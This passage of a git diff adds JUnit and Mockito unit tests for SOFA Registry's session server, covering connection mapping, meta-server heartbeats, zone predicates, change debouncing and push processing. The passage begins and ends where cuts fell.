ProvideDataChangeFetchTaskListenerTest { + @Test + public void test() { + MetaNodeSingleTaskProcessor processor = new MetaNodeSingleTaskProcessor(); + ProvideDataChangeFetchTaskListener listener = new ProvideDataChangeFetchTaskListener(processor); + listener.sessionServerConfig = TestUtils.newSessionConfig("testDc"); + listener.init(); + Assert.assertEquals(listener.support(), TaskEvent.TaskType.PROVIDE_DATA_CHANGE_FETCH_TASK); + ProvideDataChangeEvent provideDataChangeEvent = + new ProvideDataChangeEvent("testProvideDataId", 100); + TaskEvent taskEvent = + new TaskEvent(provideDataChangeEvent, TaskEvent.TaskType.PROVIDE_DATA_CHANGE_FETCH_TASK); + listener.handleEvent(taskEvent); + + Assert.assertNotNull(TaskDispatchers.getDispatcherName("test")); + Assert.assertEquals(TaskDispatchers.getTaskDispatcherMap().size(), 1); + TaskDispatchers.createSingleTaskDispatcher("test", 10, 10, 10, 10, processor); + Assert.assertEquals(TaskDispatchers.getTaskDispatcherMap().size(), 2); + TaskDispatchers.stopDefaultSingleTaskDispatcher(); + } +} diff --git a/server/server/session/src/test/java/com/alipay/sofa/registry/server/session/mapper/ConnectionMapperTest.java b/server/server/session/src/test/java/com/alipay/sofa/registry/server/session/mapper/ConnectionMapperTest.java new file mode 100644 index 000000000..2007c1b8f --- /dev/null +++ b/server/server/session/src/test/java/com/alipay/sofa/registry/server/session/mapper/ConnectionMapperTest.java @@ -0,0 +1,40 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.session.mapper; + +import java.util.Collections; +import org.junit.Assert; +import org.junit.Test; + +public class ConnectionMapperTest { + @Test + public void test() { + final String key = "testKey"; + final String val = "testVal"; + ConnectionMapper mapper = new ConnectionMapper(); + mapper.add(key, val); + Assert.assertTrue(mapper.contains(key)); + Assert.assertEquals(mapper.get(key), val); + Assert.assertNotEquals(mapper.get(key + "1"), val); + Assert.assertEquals(mapper.size(), 1); + Assert.assertEquals(mapper.get(), Collections.singletonMap(key, val)); + mapper.remove(key + "1"); + Assert.assertEquals(mapper.size(), 1); + mapper.remove(key); + Assert.assertNull(mapper.get(key)); + } +} diff --git a/server/server/session/src/test/java/com/alipay/sofa/registry/server/session/node/service/MetaServerServiceImplTest.java b/server/server/session/src/test/java/com/alipay/sofa/registry/server/session/node/service/MetaServerServiceImplTest.java new file mode 100644 index 000000000..3fa939107 --- /dev/null +++ b/server/server/session/src/test/java/com/alipay/sofa/registry/server/session/node/service/MetaServerServiceImplTest.java @@ -0,0 +1,145 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.session.node.service; + +import com.alipay.sofa.registry.common.model.metaserver.SlotTableChangeEvent; +import com.alipay.sofa.registry.common.model.metaserver.cluster.VersionedList; +import com.alipay.sofa.registry.common.model.metaserver.inter.heartbeat.BaseHeartBeatResponse; +import com.alipay.sofa.registry.common.model.metaserver.inter.heartbeat.HeartbeatRequest; +import com.alipay.sofa.registry.common.model.metaserver.nodes.SessionNode; +import com.alipay.sofa.registry.common.model.slot.SlotConfig; +import com.alipay.sofa.registry.common.model.slot.SlotTable; +import com.alipay.sofa.registry.log.Logger; +import com.alipay.sofa.registry.log.LoggerFactory; +import com.alipay.sofa.registry.server.session.TestUtils; +import com.alipay.sofa.registry.server.session.bootstrap.SessionServerConfigBean; +import com.alipay.sofa.registry.server.session.remoting.DataNodeExchanger; +import com.alipay.sofa.registry.server.session.remoting.DataNodeNotifyExchanger; +import com.alipay.sofa.registry.server.session.slot.SlotTableCacheImpl; +import com.alipay.sofa.registry.server.shared.env.ServerEnv; +import com.alipay.sofa.registry.server.shared.resource.SlotGenericResource; +import com.google.common.collect.Sets; +import java.util.Collections; +import org.junit.Assert; +import org.junit.Test; +import org.mockito.Mockito; + +public class MetaServerServiceImplTest { + private static final Logger LOGGER = LoggerFactory.getLogger(MetaServerServiceImplTest.class); + // the table epoch is 10 + private MetaServerServiceImpl impl; + private SessionServerConfigBean sessionServerConfigBean; + private SlotTableCacheImpl slotTableCache; + + @Test + public void testChangeEvent() { + init(); + SlotTableChangeEvent event = new SlotTableChangeEvent(impl.getCurrentSlotTableEpoch()); + Assert.assertTrue( + event.toString(), + event.toString().contains(String.valueOf(impl.getCurrentSlotTableEpoch()))); + Assert.assertEquals(event.getSlotTableEpoch(), impl.getCurrentSlotTableEpoch()); + Assert.assertFalse(impl.handleSlotTableChange(event)); + Assert.assertTrue( + impl.handleSlotTableChange(new SlotTableChangeEvent(impl.getCurrentSlotTableEpoch() + 1))); + } + + @Test + public void testCreateRequest() { + init(); + + Assert.assertEquals(impl.getCurrentSlotTableEpoch(), slotTableCache.getEpoch()); + final long now = System.currentTimeMillis(); + HeartbeatRequest heartbeatRequest = impl.createRequest(); + LOGGER.info("hb={}", heartbeatRequest); + + Assert.assertEquals( + heartbeatRequest.getDataCenter(), sessionServerConfigBean.getSessionServerDataCenter()); + Assert.assertEquals(heartbeatRequest.getDuration(), 0); + SessionNode node = (SessionNode) heartbeatRequest.getNode(); + Assert.assertEquals(node.getProcessId(), ServerEnv.PROCESS_ID); + Assert.assertEquals(node.getNodeUrl().getIpAddress(), ServerEnv.IP); + + Assert.assertTrue(heartbeatRequest.getTimestamp() >= now); + Assert.assertTrue(heartbeatRequest.getTimestamp() <= System.currentTimeMillis()); + + Assert.assertEquals(heartbeatRequest.getSlotTableEpoch(), impl.getCurrentSlotTableEpoch()); + Assert.assertEquals(heartbeatRequest.getSlotBasicInfo().getSlotNum(), SlotConfig.SLOT_NUM); + Assert.assertEquals( + heartbeatRequest.getSlotBasicInfo().getSlotReplicas(), SlotConfig.SLOT_REPLICAS); + + Assert.assertNotNull(heartbeatRequest.getSlotTable()); + } + + @Test + public void testHandle() { + init(); + impl = Mockito.spy(impl); + DataNodeExchanger dataNodeExchanger = new DataNodeExchanger(); + DataNodeNotifyExchanger dataNodeNotifyExchanger = new DataNodeNotifyExchanger(); + impl.setDataNodeExchanger(dataNodeExchanger); + impl.setDataNodeNotifyExchanger(dataNodeNotifyExchanger); + + Mockito.when(impl.getDataServerList()).thenReturn(Sets.newHashSet("d1", "d2")); + + BaseHeartBeatResponse resp = + new BaseHeartBeatResponse( + true, + new VersionedList(10, Collections.emptyList()), + null, + new VersionedList(10, Collections.emptyList()), + "xxx", + 100); + + SlotTable slotTable = slotTableCache.getCurrentSlotTable(); + // resp table is null, not modify the cache.table + impl.handleRenewResult(resp); + + Assert.assertEquals(dataNodeNotifyExchanger.getServerIps(), impl.getDataServerList()); + Assert.assertEquals(dataNodeExchanger.getServerIps(), impl.getDataServerList()); + Assert.assertEquals(dataNodeExchanger.getServerIps(), impl.getDataServerList()); + Assert.assertEquals(slotTable, slotTableCache.getCurrentSlotTable()); + + slotTable = new SlotTable(20, Collections.emptyList()); + resp = + new BaseHeartBeatResponse( + true, + new VersionedList(10, Collections.emptyList()), + slotTable, + new VersionedList(10, Collections.emptyList()), + "xxx", + 100); + + impl.handleRenewResult(resp); + Assert.assertEquals(slotTable, slotTableCache.getCurrentSlotTable()); + } + + private void init() { + impl = new MetaServerServiceImpl(); + sessionServerConfigBean = TestUtils.newSessionConfig("testDc"); + + impl.setSessionServerConfig(sessionServerConfigBean); + Assert.assertEquals( + impl.getRenewIntervalSecs(), sessionServerConfigBean.getSchedulerHeartbeatIntervalSecs()); + slotTableCache = new SlotTableCacheImpl(); + SlotTable slotTable = new SlotTable(10, Collections.emptyList()); + SlotGenericResource slotGenericResource = new SlotGenericResource(); + slotGenericResource.record(slotTable); + slotTableCache.updateSlotTable(slotTable); + impl.setSlotTableCache(slotTableCache); + } +} diff --git a/server/server/session/src/test/java/com/alipay/sofa/registry/server/session/node/service/SessionMetaServerManagerTest.java b/server/server/session/src/test/java/com/alipay/sofa/registry/server/session/node/service/SessionMetaServerManagerTest.java new file mode 100644 index 000000000..4868c2663 --- /dev/null +++ b/server/server/session/src/test/java/com/alipay/sofa/registry/server/session/node/service/SessionMetaServerManagerTest.java @@ -0,0 +1,42 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.session.node.service; + +import com.alipay.sofa.registry.server.session.TestUtils; +import com.alipay.sofa.registry.server.session.bootstrap.SessionServerConfig; +import org.junit.Assert; +import org.junit.Test; + +public class SessionMetaServerManagerTest { + private SessionMetaServerManager sessionMetaServerManager; + private SessionServerConfig cfg; + + private void init() { + sessionMetaServerManager = new SessionMetaServerManager(); + cfg = TestUtils.newSessionConfig("testDc"); + sessionMetaServerManager.setSessionServerConfig(cfg); + } + + @Test + public void testConfig() { + init(); + Assert.assertEquals(1, sessionMetaServerManager.getConnNum()); + Assert.assertEquals(cfg.getMetaServerPort(), sessionMetaServerManager.getServerPort()); + Assert.assertEquals( + cfg.getMetaNodeExchangeTimeoutMillis(), sessionMetaServerManager.getRpcTimeoutMillis()); + } +} diff --git a/server/server/session/src/test/java/com/alipay/sofa/registry/server/session/predicate/ZonePredicateTest.java b/server/server/session/src/test/java/com/alipay/sofa/registry/server/session/predicate/ZonePredicateTest.java new file mode 100644 index 000000000..5ef8288a4 --- /dev/null +++ b/server/server/session/src/test/java/com/alipay/sofa/registry/server/session/predicate/ZonePredicateTest.java @@ -0,0 +1,44 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.session.predicate; + +import com.alipay.sofa.registry.core.model.ScopeEnum; +import com.alipay.sofa.registry.server.session.TestUtils; +import com.alipay.sofa.registry.server.session.bootstrap.SessionServerConfigBean; +import java.util.function.Predicate; +import org.junit.Assert; +import org.junit.Test; + +public class ZonePredicateTest { + @Test + public void test() { + SessionServerConfigBean configBean = TestUtils.newSessionConfig("testDc"); + Predicate predicate = + ZonePredicate.zonePredicate("testDataId", "zoneA", ScopeEnum.zone, configBean); + Assert.assertFalse(predicate.test("zoneA")); + Assert.assertTrue(predicate.test("zoneB")); + + predicate = + ZonePredicate.zonePredicate("testDataId", "zoneA", ScopeEnum.dataCenter, configBean); + Assert.assertFalse(predicate.test("zoneA")); + Assert.assertFalse(predicate.test("zoneB")); + + predicate = ZonePredicate.zonePredicate("testDataId", "zoneA", ScopeEnum.global, configBean); + Assert.assertFalse(predicate.test("zoneA")); + Assert.assertFalse(predicate.test("zoneB")); + } +} diff --git a/server/server/session/src/test/java/com/alipay/sofa/registry/server/session/push/ChangeProcessorTest.java b/server/server/session/src/test/java/com/alipay/sofa/registry/server/session/push/ChangeProcessorTest.java new file mode 100644 index 000000000..a7678cc88 --- /dev/null +++ b/server/server/session/src/test/java/com/alipay/sofa/registry/server/session/push/ChangeProcessorTest.java @@ -0,0 +1,117 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.session.push; + +import static org.mockito.Mockito.*; + +import com.alipay.sofa.registry.server.session.TestUtils; +import com.alipay.sofa.registry.server.session.bootstrap.SessionServerConfigBean; +import org.junit.Assert; +import org.junit.Test; + +public class ChangeProcessorTest { + + private String dataCenter = "testDc"; + private String dataInfoId = "testDataInfoId"; + private int changeDebouncingMillis = 100; + private int changeDebouncingMaxMillis = 500; + + @Test + public void testWorker() throws Exception { + ChangeProcessor.Worker worker = + new ChangeProcessor.Worker(changeDebouncingMillis, changeDebouncingMaxMillis); + + Assert.assertTrue(worker.getWaitingMillis() <= 200); + + Assert.assertEquals(worker.changeDebouncingMillis, changeDebouncingMillis); + Assert.assertEquals(worker.changeDebouncingMaxMillis, changeDebouncingMaxMillis); + Assert.assertNull(worker.getExpire()); + worker.runUnthrowable(); + + ChangeProcessor.ChangeHandler handler = mock(ChangeProcessor.ChangeHandler.class); + ChangeProcessor.ChangeKey key = new ChangeProcessor.ChangeKey(dataCenter, dataInfoId); + Assert.assertTrue(key.toString(), key.toString().contains(dataInfoId)); + + long now1 = System.currentTimeMillis(); + // first commit + Assert.assertTrue(worker.commitChange(key, handler, 1000)); + long now2 = System.currentTimeMillis(); + ChangeProcessor.ChangeTask existingTask = worker.get(key); + Assert.assertNotNull(existingTask); + Assert.assertTrue(existingTask.toString().contains(dataInfoId)); + TestUtils.assertBetween( + existingTask.expireTimestamp, now1 + changeDebouncingMillis, now2 + changeDebouncingMillis); + TestUtils.assertBetween( + existingTask.expireDeadlineTimestamp, + now1 + changeDebouncingMaxMillis, + now2 + changeDebouncingMaxMillis); + + Assert.assertNull(worker.getExpire()); + // expectDatumVersion is less than exist + Assert.assertFalse(worker.commitChange(key, handler, 900)); + Assert.assertTrue(worker.commitChange(key, handler, 1100)); + ChangeProcessor.ChangeTask replaceTask = worker.get(key); + // has replace + Assert.assertTrue(replaceTask != existingTask); + Assert.assertEquals(replaceTask.expireDeadlineTimestamp, existingTask.expireDeadlineTimestamp); + // wait max deadline + Thread.sleep(changeDebouncingMaxMillis + 50); + Assert.assertTrue(worker.commitChange(key, handler, 1200)); + ChangeProcessor.ChangeTask overwriteTask = worker.get(key); + Assert.assertTrue(replaceTask == overwriteTask); + Assert.assertEquals(overwriteTask.expectDatumVersion, 1200); + worker.runUnthrowable(); + verify(handler, times(1)).onChange(anyLong(), anyString(), anyString(), anyLong()); + } + + @Test + public void testInit() throws Exception { + ChangeProcessor processor = new ChangeProcessor(); + SessionServerConfigBean configBean = TestUtils.newSessionConfig("testDc"); + processor.sessionServerConfig = configBean; + configBean.setDataChangeDebouncingMillis(100); + configBean.setDataChangeMaxDebouncingMillis(300); + processor.init(); + Assert.assertEquals( + processor.workers.length, processor.sessionServerConfig.getDataChangeFetchTaskWorkerSize()); + ChangeProcessor.Worker worker = processor.workers[0]; + Assert.assertEquals( + worker.changeDebouncingMillis, + processor.sessionServerConfig.getDataChangeDebouncingMillis()); + Assert.assertEquals( + worker.changeDebouncingMaxMillis, + processor.sessionServerConfig.getDataChangeMaxDebouncingMillis()); + + ChangeProcessor.ChangeHandler handler = mock(ChangeProcessor.ChangeHandler.class); + ChangeProcessor.ChangeKey key = new ChangeProcessor.ChangeKey(dataCenter, dataInfoId); + Assert.assertNotNull(processor.workerOf(key)); + processor.fireChange(dataCenter, dataInfoId, handler, 100); + Thread.sleep(configBean.getDataChangeDebouncingMillis() + 100); + verify(handler, times(1)).onChange(anyLong(), anyString(), anyString(), anyLong()); + } + + @Test + public void testChangeKey() { + ChangeProcessor.ChangeKey key1 = new ChangeProcessor.ChangeKey(dataCenter, dataInfoId); + ChangeProcessor.ChangeKey key2 = new ChangeProcessor.ChangeKey(dataCenter, dataInfoId); + Assert.assertEquals(key1, key2); + Assert.assertEquals(key1.hashCode(), key2.hashCode()); + + ChangeProcessor.ChangeKey key3 = new ChangeProcessor.ChangeKey(dataCenter + "1", dataInfoId); + Assert.assertNotEquals(key1, key3); + } +} diff --git a/server/server/session/src/test/java/com/alipay/sofa/registry/server/session/push/FirePushServiceTest.java b/server/server/session/src/test/java/com/alipay/sofa/registry/server/session/push/FirePushServiceTest.java new file mode 100644 index 000000000..b96e6d600 --- /dev/null +++ b/server/server/session/src/test/java/com/alipay/sofa/registry/server/session/push/FirePushServiceTest.java @@ -0,0 +1,149 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.session.push; + +import com.alipay.sofa.registry.common.model.store.SubDatum; +import com.alipay.sofa.registry.common.model.store.Subscriber; +import com.alipay.sofa.registry.server.session.TestUtils; +import com.alipay.sofa.registry.server.session.bootstrap.SessionServerConfigBean; +import com.alipay.sofa.registry.server.session.cache.CacheService; +import com.alipay.sofa.registry.server.session.cache.Value; +import com.alipay.sofa.registry.server.session.store.Interests; +import com.alipay.sofa.registry.task.FastRejectedExecutionException; +import java.util.Collections; +import org.junit.Assert; +import org.junit.Test; +import org.mockito.Mockito; + +public class FirePushServiceTest { + private String zone = "testZone"; + private String dataId = "testDataId"; + + @Test + public void testFire() { + FirePushService svc = new FirePushService(); + SessionServerConfigBean config = TestUtils.newSessionConfig("testDc"); + svc.sessionServerConfig = config; + svc.sessionInterests = Mockito.mock(Interests.class); + svc.pushProcessor = Mockito.mock(PushProcessor.class); + + Assert.assertFalse(svc.fireOnChange("testDc", "testDataId", 100)); + svc.changeProcessor = Mockito.mock(ChangeProcessor.class); + + Assert.assertTrue(svc.fireOnChange("testDc", "testDataId", 100)); + Mockito.verify(svc.changeProcessor, Mockito.times(1)) + .fireChange( + Mockito.anyString(), Mockito.anyString(), Mockito.anyObject(), Mockito.anyLong()); + + Subscriber subscriber = TestUtils.newZoneSubscriber(dataId, zone); + config.setStopPushSwitch(true); + svc.fireOnPushEmpty(subscriber); + Mockito.verify(svc.pushProcessor, Mockito.times(0)) + .firePush( + Mockito.anyObject(), Mockito.anyObject(), Mockito.anyObject(), Mockito.anyObject()); + + config.setStopPushSwitch(false); + + svc.fireOnPushEmpty(subscriber); + Mockito.verify(svc.pushProcessor, Mockito.times(1)) + .firePush( + Mockito.anyObject(), Mockito.anyObject(), Mockito.anyObject(), Mockito.anyObject()); + + Assert.assertFalse(svc.fireOnDatum(null)); + SubDatum datum = TestUtils.newSubDatum(subscriber.getDataId(), 100, Collections.emptyList()); + Assert.assertTrue(svc.fireOnDatum(datum)); + // no sub + Mockito.verify(svc.pushProcessor, Mockito.times(1)) + .firePush( + Mockito.anyObject(), Mockito.anyObject(), Mockito.anyObject(), Mockito.anyObject()); + + // registerFetchExecutor is null + Assert.assertFalse(svc.fireOnRegister(subscriber)); + svc.init(); + Assert.assertTrue(svc.fireOnRegister(subscriber)); + } + + @Test + public void testHandleFireOnRegisterException() { + Subscriber subscriber = TestUtils.newZoneSubscriber(dataId, zone); + FirePushService.handleFireOnRegisterException(subscriber, new Exception()); + FirePushService.handleFireOnRegisterException( + subscriber, new FastRejectedExecutionException("test")); + } + + private FirePushService mockFirePushService() { + FirePushService svc = new FirePushService(); + SessionServerConfigBean config = TestUtils.newSessionConfig("testDc"); + svc.sessionServerConfig = config; + svc.sessionInterests = Mockito.mock(Interests.class); + svc.pushProcessor = Mockito.mock(PushProcessor.class); + svc.sessionCacheService = Mockito.mock(CacheService.class); + return svc; + } + + @Test + public void testExecuteOnChange() { + FirePushService svc = mockFirePushService(); + + final long now = System.currentTimeMillis(); + // datum is null + Assert.assertFalse(svc.doExecuteOnChange(now, "testDc", "testDataId", 100)); + SubDatum datum = TestUtils.newSubDatum("testDataId", 200, Collections.emptyList()); + + // get the datum + Subscriber subscriber = TestUtils.newZoneSubscriber(dataId, zone); + Mockito.when(svc.sessionCacheService.getValueIfPresent(Mockito.anyObject())) + .thenReturn(new Value(datum)); + Mockito.when(svc.sessionInterests.getDatas(Mockito.anyObject())) + .thenReturn(Collections.singletonList(subscriber)); + Assert.assertTrue(svc.doExecuteOnChange(now, "testDc", "testDataId", 100)); + Mockito.verify(svc.pushProcessor, Mockito.times(1)) + .firePush( + Mockito.anyObject(), Mockito.anyObject(), Mockito.anyObject(), Mockito.anyObject()); + + // get datum is old + datum = TestUtils.newSubDatum("testDataId", 80, Collections.emptyList()); + Mockito.when(svc.sessionCacheService.getValueIfPresent(Mockito.anyObject())) + .thenReturn(new Value(datum)); + Mockito.when(svc.sessionCacheService.getValue(Mockito.anyObject())) + .thenReturn(new Value(datum)); + Assert.assertFalse(svc.doExecuteOnChange(now, "testDc", "testDataId", 100)); + } + + @Test + public void testChangeHandler() { + final long now = System.currentTimeMillis(); + FirePushService svc = mockFirePushService(); + Mockito.when(svc.sessionCacheService.getValue(Mockito.anyObject())) + .thenThrow(new RuntimeException()); + Assert.assertFalse(svc.changeHandler.onChange(now, "testDc", "testDataId", 100)); + SubDatum datum = TestUtils.newSubDatum("testDataId", 200, Collections.emptyList()); + Mockito.when(svc.sessionCacheService.getValueIfPresent(Mockito.anyObject())) + .thenReturn(new Value(datum)); + Assert.assertTrue(svc.changeHandler.onChange(now, "testDc", "testDataId", 100)); + } + + @Test + public void testOnSubscriber() { + FirePushService svc = mockFirePushService(); + Subscriber subscriber = TestUtils.newZoneSubscriber("testZone"); + subscriber.checkAndUpdateVersion("testDc", 100); + Assert.assertFalse(svc.doExecuteOnSubscriber("testDc", subscriber)); + FirePushService.RegisterTask task = svc.new RegisterTask(subscriber); + task.run(); + } +} diff --git a/server/server/session/src/test/java/com/alipay/sofa/registry/server/session/push/PushDataGeneratorTest.java b/server/server/session/src/test/java/com/alipay/sofa/registry/server/session/push/PushDataGeneratorTest.java new file mode 100644 index 000000000..aaf46ce4c --- /dev/null +++ b/server/server/session/src/test/java/com/alipay/sofa/registry/server/session/push/PushDataGeneratorTest.java @@ -0,0 +1,77 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.session.push; + +import com.alipay.sofa.registry.common.model.store.BaseInfo; +import com.alipay.sofa.registry.common.model.store.SubDatum; +import com.alipay.sofa.registry.common.model.store.SubPublisher; +import com.alipay.sofa.registry.common.model.store.Subscriber; +import com.alipay.sofa.registry.core.model.ReceivedData; +import com.alipay.sofa.registry.core.model.ScopeEnum; +import com.alipay.sofa.registry.server.session.TestUtils; +import com.google.common.collect.Lists; +import com.google.common.collect.Maps; +import java.util.List; +import java.util.Map; +import org.assertj.core.util.Sets; +import org.junit.Assert; +import org.junit.Test; + +public class PushDataGeneratorTest { + private String zone = "testZone"; + + @Test + public void testException() { + PushDataGenerator generator = new PushDataGenerator(); + generator.sessionServerConfig = TestUtils.newSessionConfig("testDc", zone); + Map subscriberMap = Maps.newHashMap(); + Subscriber sub1 = TestUtils.newZoneSubscriber(zone); + Subscriber sub2 = TestUtils.newZoneSubscriber(zone); + sub2.setScope(ScopeEnum.dataCenter); + subscriberMap.put(sub1.getRegisterId(), sub1); + subscriberMap.put(sub2.getRegisterId(), sub2); + + TestUtils.assertRunException( + RuntimeException.class, () -> generator.createPushData(null, subscriberMap)); + + sub2.setScope(ScopeEnum.zone); + sub2.setClientVersion(BaseInfo.ClientVersion.MProtocolpackage); + TestUtils.assertRunException( + IllegalArgumentException.class, () -> generator.createPushData(null, subscriberMap)); + + sub2.setClientVersion(BaseInfo.ClientVersion.StoreData); + TestUtils.assertRunException( + NullPointerException.class, () -> generator.createPushData(null, subscriberMap)); + } + + @Test + public void test() { + PushDataGenerator generator = new PushDataGenerator(); + generator.sessionServerConfig = TestUtils.newSessionConfig("testDc", zone); + Map subscriberMap = Maps.newHashMap(); + Subscriber sub1 = TestUtils.newZoneSubscriber(zone); + Subscriber sub2 = TestUtils.newZoneSubscriber(zone); + subscriberMap.put(sub1.getRegisterId(), sub1); + subscriberMap.put(sub2.getRegisterId(), sub2); + List list = Lists.newArrayList(TestUtils.newSubPublisher(10, 20)); + SubDatum subDatum = TestUtils.newSubDatum("testDataId", 200, list); + ReceivedData receivedData = (ReceivedData) generator.createPushData(subDatum, subscriberMap); + Assert.assertEquals(receivedData.getVersion().longValue(), subDatum.getVersion()); + Assert.assertEquals( + Sets.newHashSet(receivedData.getSubscriberRegistIds()), subscriberMap.keySet()); + } +} diff --git a/server/server/session/src/test/java/com/alipay/sofa/registry/server/session/push/PushProcessorTest.java b/server/server/session/src/test/java/com/alipay/sofa/registry/server/session/push/PushProcessorTest.java new file mode 100644 index 000000000..042e1bbac --- /dev/null +++ b/server/server/session/src/test/java/com/alipay/sofa/registry/server/session/push/PushProcessorTest.java @@ -0,0 +1,351 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.session.push; + +import static com.alipay.sofa.registry.server.session.push.PushMetrics.Push.*; + +import com.alipay.remoting.rpc.exception.InvokeTimeoutException; +import com.alipay.sofa.registry.common.model.store.BaseInfo; +import com.alipay.sofa.registry.common.model.store.SubDatum; +import com.alipay.sofa.registry.common.model.store.Subscriber; +import com.alipay.sofa.registry.net.NetUtil; +import com.alipay.sofa.registry.remoting.exchange.RequestChannelClosedException; +import com.alipay.sofa.registry.server.session.TestUtils; +import com.alipay.sofa.registry.server.session.bootstrap.SessionServerConfigBean; +import com.alipay.sofa.registry.server.session.node.service.ClientNodeService; +import java.util.Collections; +import java.util.List; +import java.util.concurrent.Executors; +import java.util.concurrent.ThreadPoolExecutor; +import java.util.concurrent.atomic.AtomicReference; +import org.junit.Assert; +import org.junit.Test; +import org.mockito.Mockito; + +public class PushProcessorTest { + private String zone = "testZone"; + private String dataId = "testDataId"; + + @Test + public void testFire() throws Exception { + PushProcessor processor = new PushProcessor(); + processor.sessionServerConfig = TestUtils.newSessionConfig("testDc"); + Assert.assertTrue(processor.watchDog.getWaitingMillis() < 200); + + Assert.assertEquals(processor.watchCommit().size(), 0); + + PushCause pushCause = + new PushCause(System.currentTimeMillis(), PushType.Reg, System.currentTimeMillis()); + Subscriber subscriber = TestUtils.newZoneSubscriber(dataId, zone); + SubDatum datum = TestUtils.newSubDatum(subscriber.getDataId(), 100, Collections.emptyList()); + Assert.assertTrue(processor.pendingTasks.isEmpty()); + + long now1 = System.currentTimeMillis(); + processor.firePush( + pushCause, + NetUtil.getLocalSocketAddress(), + Collections.singletonMap(subscriber.getRegisterId(), subscriber), + datum); + long now2 = System.currentTimeMillis(); + + Assert.assertEquals(processor.pendingTasks.size(), 1); + PushProcessor.PendingTaskKey taskKey = processor.pendingTasks.keySet().iterator().next(); + Assert.assertTrue(taskKey.toString(), taskKey.toString().contains(dataId)); + + PushProcessor.PushTask task = processor.pendingTasks.values().iterator().next(); + TestUtils.assertBetween( + task.expireTimestamp, + now1 + processor.sessionServerConfig.getPushDataTaskDebouncingMillis(), + now2 + processor.sessionServerConfig.getPushDataTaskDebouncingMillis()); + + Assert.assertEquals(PENDING_SKIP_COUNTER.get(), 0, 0); + // make sure the expire ts is diff + Thread.sleep(1); + // fire again, skip + processor.firePush( + pushCause, + NetUtil.getLocalSocketAddress(), + Collections.singletonMap(subscriber.getRegisterId(), subscriber), + datum); + Assert.assertEquals(PENDING_SKIP_COUNTER.get(), 1, 0); + 